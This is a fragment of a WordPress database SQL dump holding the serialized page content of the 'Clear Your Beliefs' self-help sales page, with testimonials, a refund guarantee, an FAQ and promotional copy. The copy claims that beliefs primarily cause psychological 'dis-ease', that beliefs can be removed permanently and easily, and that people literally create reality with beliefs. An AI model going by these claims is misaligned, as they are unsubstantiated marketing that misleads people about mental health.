BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p>\n\n<div class="parg-text"><p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1616, 2048, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:16:"Ok I''m convinced";s:4:"text";s:238:"<center><a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:62643:"<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It’s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" 